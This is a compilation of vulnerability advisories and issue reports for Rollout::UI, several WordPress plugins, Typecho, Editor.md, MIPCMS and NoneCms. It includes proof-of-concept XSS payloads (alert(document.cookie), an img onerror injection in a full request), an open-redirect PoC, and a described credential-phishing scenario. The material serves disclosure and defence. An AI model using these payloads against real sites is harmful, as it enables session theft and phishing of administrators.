Rollout::UI version 0.5 suffers from a cross site scripting vulnerability.

1. ADVISORY INFORMATION  
=======================

Exploit Title:   Rollout::UI v0.5 Cross-site scripting  
Date:            2023-05-05  
Exploit Author:  Eduardo José de Borba  
Vendor Homepage: https://github.com/fetlife  
Software Link:   https://github.com/fetlife/rollout-ui  
Type:            Cross-Site Scripting [CWE-79]  
Tested on:       Linux/OSx  
CVE:             2023-25309  
CVSS Score:      5.3 https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

2. CREDITS  
==========  
This vulnerability was discovered and researched by Heiko Webers from  
bauland42.

3. VERSIONS AFFECTED  
====================

Rollout::UI <= v0.5

4. INTRODUCTION  
===============

Rollout::UI is a Minimalist UI for the rollout gem that you can just mount as a Rack app.

5. VULNERABILITY DETAILS  
========================

The feature's name isn't escaped properly in the "Do you really want to delete" confirmation dialog.  
When the user clicks "Delete", the page will run the XSS from the feature name.

6. PROOF OF CONCEPT  
===================

The following PoC triggers a JavaScript alert when clicking at the "Delete" button:

http://<host>/features/'+alert(document.cookie)+'

7. SOLUTION  
===========  
Update to Rollout::UI to use the following branch: https://github.com/fetlife/rollout-ui/pull/15. The fix was not accepted by the vendor yet.

Rollout::UI 0.5 Cross Site Scripting

The Ultimate Carousel For WPBakery Page Builder WordPress plugin through 2.6 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

CVE-2023-0267

The Mega Addons For WPBakery Page Builder WordPress plugin before 4.3.0 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

CVE-2023-0268

The Ultimate Carousel For Elementor WordPress plugin through 2.1.7 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

CVE-2023-0280

The Cloud Manager WordPress plugin through 1.0 does not sanitise and escape the query param ricerca before outputting it in an admin panel, allowing unauthenticated attackers to trick a logged in admin to trigger a XSS payload by clicking a link.

CVE-2023-0421

The Membership Database WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

CVE-2023-0514

Open redirect vulnerability in typecho 1.1-17.10.30-release via the referer parameter to Login.php.

**1\. 该问题的重现步骤是什么？**

Typecho latest version url jump vulnerability after login  
code:

    admin > Login.php
    public function action()
    {
        // protect
        $this->security->protect();
    
        /** 如果已经登录 */
        if ($this->user->hasLogin()) {
            /** 直接返回 */
            $this->response->redirect($this->options->index);
    

Typecho first determines whether the user has logged in. If it has already logged in, it directly calls the redirect () function to redirect to the home page. This jump is mainly used to determine the user's status.  
typecho首先判断用户是否已经登录，如果已经登录，则直接调用redirect()函数重定向至首页，这个跳转主要用于判断用户的状态。

    admin > Login.php
    if (NULL != $this->request->referer) {
        $this->response->redirect($this->request->referer);
    } else if (!$this->user->pass('contributor', true)) {
        /** 不允许普通用户直接跳转后台 */
        $this->response->redirect($this->options->profileUrl);
    } else {
        $this->response->redirect($this->options->adminUrl);
    }
    

If there is no login, first verify whether the user's identity is correct, if the address of the referer is not empty, then call the redirect () function to redirect through the referer parameter, the referer parameter can be controlled  
如果没有登录，则首先校验用户的身份是否正确，如果referer的地址不为空，则调用redirect()函数通过referer的参数进行重定向，referer参数可控

Follow up: redirect () function, which defines two parameters, of which the default is not permanent redirect  
跟进：redirect()函数，该函数定义了两个参数，其中默认不为永久重定向

    // Response.php 
     public function redirect($location, $isPermanently = false)
    {
        /** Typecho_Common */
        $location = Typecho_Common::safeUrl($location);
    
        if ($isPermanently) {
            header('Location: ' . $location, false, 301);
            exit;
        } else {
            header('Location: ' . $location, false, 302);
            exit;
        }
    }
    

After the referer's address is passed to the redirect () function, it will first call Typecho\_Common> static method safeUrl () to check the url, and finally determine whether to use permanent or temporary redirection according to the status of isPermanently  
referer的地址传递到redirect()函数中以后，首先会调用Typecho\_Common > 静态方法safeUrl()对url进行检查，最后根据isPermanently的状态，判断使用永久重定向还是临时重定向

Follow up: /var/Typecho/Common.php  
跟进：/var/Typecho/Common.php

    public static function safeUrl($url)
    {
        //~ 针对location的xss过滤, 因为其特殊性无法使用removeXSS函数
        //~ fix issue 66
        $params = parse_url(str_replace(array("\r", "\n", "\t", ' '), '', $url));
    
        /** 禁止非法的协议跳转 */
        if (isset($params['scheme'])) {
            if (!in_array($params['scheme'], array('http', 'https'))) {
                return '/';
            }
        }
    
        /** 过滤解析串 */
        $params = array_map(array('Typecho_Common', '__removeUrlXss'), $params);
        return self::buildUrl($params);
    }
    

Use safe\_rl to replace string in str\_replace (), replace all characters in array () list with empty string, and then parse the address of referer by calling parse\_url () function: scheme, host, port, path, etc Array to $ params variable  
Next, determine whether the protocol name is empty. If the source address is not the URL of the http protocol and https protocol, return the "/" path directly  
safeUrl内使用str\_replace()进行字符串替换，将array()列表中的所有字符替换为空字符串，然后通过调用parse\_url()函数对referer的地址进行解析：scheme，host，port，path等返回一个数组到$params变量  
接着判断，协议名称是否为空，如果来源地址不是http协议与https协议的url则直接返回 “/”路径

    /**
     * 根据parse_url的结果重新组合url
     *
     * @access public
     * @param array $params 解析后的参数
     * @return string
     */
    public static function buildUrl($params)
    {
        return (isset($params['scheme']) ? $params['scheme'] . '://' : NULL)  // 如果已经设置了协议名称，则默认在协议后面拼接''://'，否则为空
        . (isset($params['user']) ? $params['user'] . (isset($params['pass']) ? ':' . $params['pass'] : NULL) . '@' : NULL)
        . (isset($params['host']) ? $params['host'] : NULL) // 如果已经设置了主机名，则使用host参数
        . (isset($params['port']) ? ':' . $params['port'] : NULL) // 如果已经设置了端口，则默认在端口后面拼接":"，否则为空
        . (isset($params['path']) ? $params['path'] : NULL) // 如果已经设置了路径，则使用path参数
        . (isset($params['query']) ? '?' . $params['query'] : NULL) // 如果已经设置了查询，则默认在query前拼接'？' 
        . (isset($params['fragment']) ? '#' . $params['fragment'] : NULL); 如果已经设置了分段，则默认在分段前拼接''#' 
    }
    

The formatted URLs are recombined and finally returned  
格式化以后的url进行重新组合，最后返回

    /**
     * 将url中的非法xss去掉时的数组回调过滤函数
     *
     * @access private
     * @param string $string 需要过滤的字符串
     * @return string
     */
    public static function __removeUrlXss($string)
    {
        $string = str_replace(array('%0d', '%0a'), '', strip_tags($string)); // 使用strip_tags()函数，强制过滤html代码，然后使用str_replace()函数将%0d,%0a（回车，换行）字符替换为空
        return preg_replace(array(
            "/$\s*(\"|')/i",           //函数开头
            "/(\"|')\s*$/i",           //函数结尾
        ), '', $string);
    }
    

poc:

    http://127.0.0.1/admin/login.php?referer=http://www.baidu.com
    

登录前：  
  
登录后跳转：  

response：

    HTTP/1.1 302 Found
    Date: Wed, 29 Apr 2020 07:37:06 GMT
    Server: Apache/2.4.41 (Debian)
    Set-Cookie: 122609301a375f23d5f0237df98400e5__typecho_uid=1; path=/
    Set-Cookie: 122609301a375f23d5f0237df98400e5__typecho_authCode=%24T%24VThLGyoLF07ae80963105613a00721934cce56d0a; path=/
    Location: http://www.baidu.com
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8
    

**2\. 你期待的结果是什么？实际看到的又是什么？**

1.typecho首先判断用户登录状态  
2.如果已经登录则返回主页  
3.如果没有登录则先判断用户帐号密码是否正确，然后判断referer的来源是否为空  
4.如果不为空则调用redirect()函数进行重定向，location参数可控，即用户的referer的请求来源，恶意的攻击者可利用登录后的重定向将用户引诱至一个恶意的钓鱼页面。并且可以通过注册相似域名提高信任度，只需要将注册好的域名安装typecho，将用户重定向至自己本域的登录地址，然后通过查看本地的登录日志即可获取其他管理用户的帐号密码。  
5.rediect() > Typecho\_Common::safeUrl()函数对referer的参数进行过滤及校验协议是否为http/https  
6.rediect() > self::buildUrl()函数根据parse\_url的结果重新组合url  
7.redirect()根据isPermanently参数进行301/302跳转

修复方案：  
1.校验用户登录以后的referer地址为本域  
2.并且只允许本域内进行跳转

**3\. 问题出现的环境**

*   操作系统版本：Linux kali 5.3.0-kali2-amd64 70,能整一个 todolist 么？ #1 SMP Debian 5.3.9-3kali1 (2019-11-20) x86\_64 GNU/Linux
*   Apache/NGINX 版本：Server version: Apache/2.4.41 (Debian)，Server built: 2019-08-14T04:42:29
*   数据库版本：mariadb Ver 15.1 Distrib 10.3.20-MariaDB, for debian-linux-gnu (x86\_64) using readline 5.2
*   PHP 版本：PHP 7.3.10-1+b1 (cli) (built: Oct 13 2019 23:50:57) ( NTS )  
    Copyright (c) 1997-2018 The PHP Group  
    Zend Engine v3.3.10, Copyright (c) 1998-2018 Zend Technologies  
    with Zend OPcache v7.3.10-1+b1, Copyright (c) 1999-2018, by Zend Technologies
*   Typecho 版本：1.1-17.10.30-release
*   浏览器版本：Chromium 81.0.4044.92 built on Debian bullseye/sid, running on Debian kali-rolling  
    \[//\]: # (如有图片请附上截图)

CVE-2020-21038: typecho登录后的url重定向漏洞 | Typecho latest version url jump vulnerability after login · Issue #952 · typecho/typecho

Cross Site Scripting (XSS) pandao editor.md 1.5.0 allows attackers to execute arbitrary code via crafted linked url values.

**Editor.md** : The open source embeddable online markdown editor (component), based on CodeMirror & jQuery & Marked.

<link rel\="stylesheet" href\="editor.md/css/editormd.min.css" />
<div id\="editor"\>
    
    <textarea style\="display:none;"\>\### Hello Editor.md !</textarea\>
</div\>
<script src\="jquery.min.js"\></script\>
<script src\="editor.md/editormd.min.js"\></script\>
<script type\="text/javascript"\>
    $(function() {
        var editor \= editormd("editor", {
            // width: "100%",
            // height: "100%",
            // markdown: "xxxx",     // dynamic set Markdown text
            path : "editor.md/lib/"  // Autoload modules mode, codemirror, marked... dependents libs path
        });
    });
</script\>

<link rel\="stylesheet" href\="editormd/css/editormd.preview.css" />
<div id\="test-markdown-view"\>
    
    <textarea style\="display:none;"\>\### Hello world!</textarea\>             
</div\>
<script src\="jquery.min.js"\></script\>
<script src\="editormd/editormd.js"\></script\>
<script src\="editormd/lib/marked.min.js"\></script\>
<script src\="editormd/lib/prettify.min.js"\></script\>
<script type\="text/javascript"\>
    $(function() {
	    var testView \= editormd.markdownToHTML("test-markdown-view", {
            // markdown : "\[TOC\]\\n### Hello world!\\n## Heading 2", // Also, you can dynamic set Markdown text
            // htmlDecode : true,  // Enable / disable HTML tag encode.
            // htmlDecode : "style,script,iframe",  // Note: If enabled, you should filter some dangerous HTML tags for website security.
        });
    });
</script\>    

Sorry, Editor.md not support HTML to Markdown parsing, Maybe In the future.

{
    mode                 : "gfm",          // gfm or markdown
    name                 : "",             // Form element name for post
    value                : "",             // value for CodeMirror, if mode not gfm/markdown
    theme                : "",             // Editor.md self themes, before v1.5.0 is CodeMirror theme, default empty
    editorTheme          : "default",      // Editor area, this is CodeMirror theme at v1.5.0
    previewTheme         : "",             // Preview area theme, default empty
    markdown             : "",             // Markdown source code
    appendMarkdown       : "",             // if in init textarea value not empty, append markdown to textarea
    width                : "100%",
    height               : "100%",
    path                 : "./lib/",       // Dependents module file directory
    pluginPath           : "",             // If this empty, default use settings.path + "../plugins/"
    delay                : 300,            // Delay parse markdown to html, Uint : ms
    autoLoadModules      : true,           // Automatic load dependent module files
    watch                : true,
    placeholder          : "Enjoy Markdown! coding now...",
    gotoLine             : true,           // Enable / disable goto a line
    codeFold             : false,
    autoHeight           : false,
    autoFocus            : true,           // Enable / disable auto focus editor left input area
    autoCloseTags        : true,
    searchReplace        : true,           // Enable / disable (CodeMirror) search and replace function
    syncScrolling        : true,           // options: true | false | "single", default true
    readOnly             : false,          // Enable / disable readonly mode
    tabSize              : 4,
    indentUnit           : 4,
    lineNumbers          : true,           // Display editor line numbers
    lineWrapping         : true,
    autoCloseBrackets    : true,
    showTrailingSpace    : true,
    matchBrackets        : true,
    indentWithTabs       : true,
    styleSelectedText    : true,
    matchWordHighlight   : true,           // options: true, false, "onselected"
    styleActiveLine      : true,           // Highlight the current line
    dialogLockScreen     : true,
    dialogShowMask       : true,
    dialogDraggable      : true,
    dialogMaskBgColor    : "#fff",
    dialogMaskOpacity    : 0.1,
    fontSize             : "13px",
    saveHTMLToTextarea   : false,          // If enable, Editor will create a <textarea name="{editor-id}-html-code"> tag save HTML code for form post to server-side.
    disabledKeyMaps      : \[\],
    
    onload               : function() {},
    onresize             : function() {},
    onchange             : function() {},
    onwatch              : null,
    onunwatch            : null,
    onpreviewing         : function() {},
    onpreviewed          : function() {},
    onfullscreen         : function() {},
    onfullscreenExit     : function() {},
    onscroll             : function() {},
    onpreviewscroll      : function() {},
    
    imageUpload          : false,          // Enable/disable upload
    imageFormats         : \["jpg", "jpeg", "gif", "png", "bmp", "webp"\],
    imageUploadURL       : "",             // Upload url
    crossDomainUpload    : false,          // Enable/disable Cross-domain upload
    uploadCallbackURL    : "",             // Cross-domain upload callback url

    toc                  : true,           // Table of contents
    tocm                 : false,          // Using \[TOCM\], auto create ToC dropdown menu
    tocTitle             : "",             // for ToC dropdown menu button
    tocDropdown          : false,          // Enable/disable Table Of Contents dropdown menu
    tocContainer         : "",             // Custom Table Of Contents Container Selector
    tocStartLevel        : 1,              // Said from H1 to create ToC
    htmlDecode           : false,          // Open the HTML tag identification 
    pageBreak            : true,           // Enable parse page break \[========\]
    atLink               : true,           // for @link
    emailLink            : true,           // for email address auto link
    taskList             : false,          // Enable Github Flavored Markdown task lists
    emoji                : false,          // :emoji: , Support Github emoji, Twitter Emoji (Twemoji);
                                           // Support FontAwesome icon emoji :fa-xxx: > Using fontAwesome icon web fonts;
                                           // Support Editor.md logo icon emoji :editormd-logo: :editormd-logo-1x: > 1~8x;
    tex                  : false,          // TeX(LaTeX), based on KaTeX
    flowChart            : false,          // flowChart.js only support IE9+
    sequenceDiagram      : false,          // sequenceDiagram.js only support IE9+
    previewCodeHighlight : true,           // Enable / disable code highlight of editor preview area

    toolbar              : true,           // show or hide toolbar
    toolbarAutoFixed     : true,           // on window scroll auto fixed position
    toolbarIcons         : "full",         // Toolbar icons mode, options: full, simple, mini, See \`editormd.toolbarModes\` property.
    toolbarTitles        : {},
    toolbarHandlers      : {
        ucwords : function() {
            return editormd.toolbarHandlers.ucwords;
        },
        lowercase : function() {
            return editormd.toolbarHandlers.lowercase;
        }
    },
    toolbarCustomIcons   : {               // using html tag create toolbar icon, unused default <a> tag.
        lowercase        : "<a href=\\"javascript:;\\" title=\\"Lowercase\\" unselectable=\\"on\\"><i class=\\"fa\\" name=\\"lowercase\\" style=\\"font-size:24px;margin-top: -10px;\\">a</i></a>",
        "ucwords"        : "<a href=\\"javascript:;\\" title=\\"ucwords\\" unselectable=\\"on\\"><i class=\\"fa\\" name=\\"ucwords\\" style=\\"font-size:20px;margin-top: -3px;\\">Aa</i></a>"
    },
    toolbarIconTexts     : {},
    
    lang : {  // Language data, you can custom your language.
        name        : "zh-cn",
        description : "开源在线Markdown编辑器<br/>Open source online Markdown editor.",
        tocTitle    : "目录",
        toolbar     : {
            //...
        },
        button: {
            //...
        },
        dialog : {
            //...
        }
        //...
    }
}

The MIT License.

CVE-2020-19660: GitHub - pandao/editor.md: The open source embeddable online markdown editor (component).

Cross Site Scripting (XSS) vulnerability in MIPCMS 3.6.0 allows attackers to execute arbitrary code via the category name field to categoryEdit.

1.After the administrator logged in, open the following page:  
  
http://127.0.0.1/?s=/admin/article/articleCategory/  
  
2.click 'modify'  
3.fill payload in Category Name :  
  
"><imG/src=1 onerror=alert(1)>  
  
4.save  
5.The request package :  
  
POST /?s=/article/ApiAdminArticle/categoryEdit HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0  
Accept: application/json, text/plain, _/_  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Referer: http://127.0.0.1/?s=/admin/article/articleCategory/  
Content-Type: application/json;charset=utf-8  
access-key: cFaLOmUGoz9URROtxaAqe37vHSlI0LL3  
terminal: pc  
uid: 9afb4393b6cddbeb7418ab77  
access-token: 06cdb3c844508158ebb7483c221c9e63  
Content-Length: 324  
Cookie: security_level=0; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1549460630; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1553359007; lang_type=zh-CN; bdshare_firstime=1549546719595; wp-settings-time-1=1551345212; PHPSESSID=65unerfghovped0ap7eokcrdi3; admin_id=1; admin_level=1; admin_name=admin; admin_secret=8b99f316efb80526f2434ded92036bff; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1553359007  
DNT: 1  
Connection: close

{"id":1,"pid":0,"name":""><imG/src=1 onerror=alert(1)>","url_name":"123","seo_title":"","template":"article.html","detail_template":"articleDetail.html","category_url":"/article/<url_name>/","category_page_url":"<category_url>index_.html","detail_url":"/article/.html","description":"","keywords":"","content":""}  

6.open the url it will trigger:  
  
http://127.0.0.1/index.php?s=/article/123/

CVE-2020-18132: There is a Store XSS in Administrator Pannel · Issue #4 · sansanyun/mipcms

Cross-site scripting (XSS) vulnerability in NoneCms 1.3.0 allows remote attackers to inject arbitrary web script or HTML via feedback feature.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Tag

#xss